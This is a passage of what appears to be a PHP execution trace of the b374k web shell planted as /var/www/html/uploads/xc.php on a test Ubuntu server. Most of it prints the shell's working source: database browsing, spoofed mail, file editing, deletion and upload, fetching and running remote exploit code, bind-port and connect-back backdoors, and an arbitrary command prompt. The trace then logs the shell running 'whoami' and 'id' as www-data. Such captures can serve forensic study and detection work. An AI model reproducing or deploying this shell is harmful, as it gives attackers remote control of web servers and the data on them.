type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&amp;view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&amp;edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$file\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$file\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&amp;view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=code\\">code</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&amp;img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> '	/var/www/html/uploads/xc.php	194	0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$ver = '1.01'
3	9	0	0.003064	692624	getenv	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'SERVER_SOFTWARE'
3	9	1	0.003082	692704
3	9	R			'Apache/2.4.52 (Ubuntu)'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$software = 'Apache/2.4.52 (Ubuntu)'
3	10	0	0.003110	692672	ini_get	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'safe_mode'
3	10	1	0.003125	692704
3	10	R			FALSE
3	11	0	0.003139	692672	ini_get	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'safe_mode'
3	11	1	0.003153	692704
3	11	R			FALSE
3	12	0	0.003166	692672	strtolower	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	FALSE
3	12	1	0.003181	692704
3	12	R			''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$safemode = FALSE
3	13	0	0.003206	692672	php_uname	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
3	13	1	0.003221	692784
3	13	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3	14	0	0.003256	692784	substr	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	3
3	14	1	0.003274	692912
3	14	R			'Lin'
3	15	0	0.003287	692816	strtolower	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'Lin'
3	15	1	0.003300	692880
3	15	R			'lin'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$win = FALSE
3	16	0	0.003326	692784	exe	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'whoami'
4	17	0	0.003340	692784	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'system'
4	17	1	0.003353	692824
4	17	R			TRUE
4	18	0	0.003366	692784	ob_start	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	18	1	0.003380	709296
4	18	R			TRUE
4	19	0	0.003393	709296	system	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'whoami'
4	19	1	0.005586	709368
4	19	R			'www-data'
4	20	0	0.005617	709296	ob_get_contents	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	20	1	0.005633	709336
4	20	R			'www-data\n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff = 'www-data\n'
4	21	0	0.005662	709336	ob_end_clean	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	21	1	0.005676	692824
4	21	R			TRUE
3	16	1	0.005690	692824
3	16	R			'www-data\n'
3	22	0	0.005704	692824	rapih	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'www-data\n'
4	23	0	0.005720	692824	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	'<br />'	''	'www-data\n'
4	23	1	0.005744	692920
4	23	R			'www-data\n'
4	24	0	0.005759	692824	trim	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'www-data\n'
4	24	1	0.005773	692896
4	24	R			'www-data'
3	22	1	0.005786	692864
3	22	R			'www-data'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$user = 'www-data'
3	25	0	0.005813	692824	exe	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'id'
4	26	0	0.005826	692824	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'system'
4	26	1	0.005841	692864
4	26	R			TRUE
4	27	0	0.005853	692824	ob_start	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	27	1	0.005867	709336
4	27	R			TRUE
4	28	0	0.005880	709336	system	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'id'
4	28	1	0.007317	709448
4	28	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4	29	0	0.007355	709336	ob_get_contents	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	29	1	0.007370	709416
4	29	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4	30	0	0.007403	709416	ob_end_clean	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
4	30	1	0.007418	692904
4	30	R			TRUE
3	25	1	0.007432	692904
3	25	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3	31	0	0.007448	692904	rapih	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4	32	0	0.007464	692904	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	'<br />'	''	'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4	32	1	0.007483	693000
4	32	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4	33	0	0.007499	692904	trim	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4	33	1	0.007514	693016
4	33	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3	31	1	0.007529	692984
3	31	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$prompt = 'www-data $ '
3	34	0	0.007570	692944	getcwd	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	0
3	34	1	0.007585	692992
3	34	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwd = '/var/www/html/uploads/'
3	35	0	0.007621	692992	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'posix_getpwuid'
3	35	1	0.007643	693032
3	35	R			TRUE
3	36	0	0.007659	692992	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'posix_getgrgid'
3	36	1	0.007676	693032
3	36	R			TRUE
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$posix = TRUE
3	37	0	0.007701	692992	gethostbyname	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'localhost'
3	37	1	0.007743	693072
3	37	R			'127.0.0.1'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$server_ip = '127.0.0.1'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$my_ip = '127.0.0.1'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$bindport = '13123'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$bindport_pass = 'b374k'
3	38	0	0.007805	693032	explode	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'/'	'/var/www/html/uploads/'
3	38	1	0.007822	693640
3	38	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i = 0
3	39	0	0.007881	693568	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	39	1	0.007899	693600
3	39	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j = 0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= '/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl .= '<a href="?y=/"> / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3	40	0	0.007990	693648	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	40	1	0.008008	693680
3	40	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j = 0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= '/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'var/'
